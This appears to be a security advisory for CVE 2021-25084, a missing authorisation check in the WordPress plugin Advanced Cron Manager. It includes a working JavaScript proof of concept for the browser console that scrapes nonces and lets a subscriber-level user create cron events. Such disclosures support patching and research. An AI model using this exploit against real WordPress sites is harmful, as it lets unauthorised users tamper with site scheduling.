Advanced Cron Manager – Subscriber+ Arbitrary Events/Schedules Creation/Deletion | CVE 2021-25084

Description

The plugins do not have authorisation checks in some of their AJAX actions, allowing any authenticated users, such as subscriber to call them and add or remove events as well as schedules for example

Proof of Concept

Execute the below command in the web developer console of the web browser when being logged in as any user (such as subscriber). This will create an example_hook schedule

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"acm/rerender/events"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) {
    const page_nonce = data.match(/<a href=\\"#\\" class=\\"add-event page-title-action\\" data-nonce=\\"([0-9a-f]*)\\">Add new event<\\\/a>/)[1];

    fetch("http://example.com/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded",
      },
      "body": new URLSearchParams({"action":"acm/event/add/form", "nonce": page_nonce}),
      "method": "POST",
      "credentials": "include"
    })
    .then(response => response.text())
    .then(function(data) {
        const submit_nonce = data.match(/<input type=\\"hidden\\" id=\\"nonce\\" name=\\"nonce\\" value=\\"([0-9a-f]*)\\"/)[1];

        fetch("http://example.com/wp-admin/admin-ajax.php", {
          "headers": {
            "content-type": "application/x-www-form-urlencoded",
          },
          "body": new URLSearchParams({"action":"acm/event/add/form", "nonce": page_nonce}),
          "method": "POST",
          "credentials": "include"
        })
        .then(response => response.text())
        .then(function(data) {
          fetch("http://example.com/wp-admin/admin-ajax.php", {
            "headers": {
              "content-type": "application/x-www-form-urlencoded",
            },
            "body": new URLSearchParams({"action":"acm/event/insert", "nonce": submit_nonce, "data": "execution_offset=2&hook=example_hook&schedule=hourly"}),
            "method": "POST",
            "credentials": "include"
          })
          .then(response => response.text())
          .then(function(data) {
            console.log(data);
          });
        });
    });
  });